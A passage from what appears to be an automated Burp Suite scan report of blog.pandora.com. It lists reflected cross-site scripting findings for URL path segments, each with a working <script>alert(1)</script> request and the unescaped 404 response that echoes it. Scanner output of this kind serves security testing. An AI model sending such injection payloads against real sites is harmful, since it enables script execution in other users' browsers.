Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ was not found on this server.</p>
...[SNIP]...

3.164. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)</script>20dad2bc554 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ was not found on this server.</p>
...[SNIP]...

3.165. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)</script>a4032462556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ was not found on this server.</p>
...[SNIP]...

3.166. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)</script>3d971d76d88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ was not found on this server.</p>
...[SNIP]...

3.167. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)</script>db42742e74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ was not found on this server.</p>
...[SNIP]...

3.168. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)</script>e46d04bff1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ was not found on this server.</p>
...[SNIP]...

3.169. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)</script>f39701078da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ was not found on this server.</p>
...[SNIP]...

3.170. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)</script>2ae1ae68fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ was not found on this server.</p>
...[SNIP]...

3.171. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)</script>aa701cd74e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ was not found on this server.</p>
...[SNIP]...

3.172. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)</script>b55ef145dcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ was not found on this server.</p>
...[SNIP]...

3.173. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)</script>e32ca06f3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ was not found on this server.</p>
...[SNIP]...

3.174. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)</script>b4e2002f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ was not found on this server.</p>
...[SNIP]...

3.175. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)</script>3e603248071 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ was not found on this server.</p>
...[SNIP]...

3.176. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)</script>b77f6aa2ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ was not found on this server.</p>
...[SNIP]...

3.177. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)</script>b71e5ef0a26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ was not found on this server.</p>
...[SNIP]...

3.178. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)</script>e78182be82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ was not found on this server.</p>
...[SNIP]...

3.179. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)</script>1ff330e9b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ was not found on this server.</p>
...[SNIP]...

3.180. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)</script>5c048a41cfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
